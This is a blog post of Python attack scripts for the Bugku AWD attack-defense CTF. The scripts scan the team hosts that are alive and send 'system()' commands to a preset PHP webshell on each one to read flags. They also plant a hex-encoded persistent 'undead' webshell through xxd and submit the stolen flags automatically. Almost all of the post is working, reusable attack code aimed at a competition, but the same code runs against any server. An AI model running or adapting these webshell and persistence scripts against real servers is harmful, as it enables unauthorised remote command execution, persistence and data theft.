Bugku线上AWD脚本

Bugku手写小脚本(大佬就不用看了,鄙人水平有限)

首先是检测网站存活脚本

import urllib.request
import time
 
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/49.0.2')]

for n in range(1,255):
    nb = str(n)
    target = 'http://192-168-1-'+nb+'.awd.bugku.cn/'
    new = open('H:/Python3.0Work/AWD/bugkuwz.txt',mode='a+',encoding='utf-8')
    new.write(target)
    new.write('\n')

file = open('H:/Python3.0Work/AWD/bugkuwz.txt')
lines = file.readlines()
aa=[]
for line in lines:
	temp=line.replace('\n','')
	aa.append(temp)
 
print('存活网站如下:')
for a in aa:
	tempUrl = a
	try :
		opener.open(tempUrl)
		print(tempUrl)
	except urllib.error.HTTPError:
		# print(tempUrl+'     访问页面出错')
		time.sleep(0.5)
	except urllib.error.URLError:
		# print(tempUrl+'     访问页面出错')
		time.sleep(0.5)
	time.sleep(0.1)

连接预设后门脚本进行一系列操作


from urllib import request
import re
import requests

#连接预留木马进行flag的获取
def getflag():
	url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  #已知马填写
	cmd = {'a' : "system('cat /flag')"}  #参数填写
	for i in range(1,255):
		try:
			r = requests.post(url.format(str(i)),data=cmd,timeout=2)
			f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
			f.write(r.text)
		except:
			pass

#连接预留木马进行内存马的注入
def Nodead():
	url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  #已知马填写
	cmd = {'a' : "system('echo (注意这里填写十六进制转码后的不死马)|xxd -r -ps > bsm.php')"}  #参数[a]  进行写入不死马

	for i in range(1,255):
		try:
			r = requests.post(url.format(str(i)),data=cmd,timeout=1)
			print(r.url+'存在已知木马,已写入不死马请尽快执行不死马')
			response = request.urlopen('http://192-168-1-'+str(i)+'.awd.bugku.cn/bsm.php',timeout=1)
			res = response.read().decode('utf-8')
			print (res)
		except:
			pass

#提交flag
def intoflag():
	f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
	while 1:
		flag = f.readline()
		if not flag:
			break
		else:
			F1 = re.sub('{','',flag)
			F2 = re.sub('}','',F1)
			F3 = re.sub('flag','',F2,1)
			response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[      ]&flag='+F3+'',timeout=1)
			res = response.read().decode('utf-8')
			print (res)
	f.close()

if __name__ =='__main__':
	print('Loading......')
	getflag()
	intoflag()
	Nodead()
	print('AttackOver!')




持续攻击(连接不死马)

import requests
import re
from urllib import request

def getflag():

	url = 'http://192-168-1-{}.awd.bugku.cn/.123.php'  #填写不死马的位置
	cmd = {'a' : "system('cat /flag')"}
	for i in range(1,255):
		try:
			b = requests.post(url.format(str(i)),data=cmd,timeout=1)
			f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
			f.write(b.text)
			f.close()
		except:
			pass

def intoflag():

	f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
	while 1:
		flag = f.readline()
		if not flag:
			break
		else:
			F1 = re.sub('{','',flag)
			F2 = re.sub('}','',F1)
			F3 = re.sub('flag','',F2,1)
			response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[       ]&flag='+F3+'',timeout=1)
			res = response.read().decode('utf-8')
			print (res)

	f.close()

if __name__ =='__main__':
	print('后续攻击开始展开......')
	getflag()
	intoflag()
	print('AttackOver!')


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂的1998

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值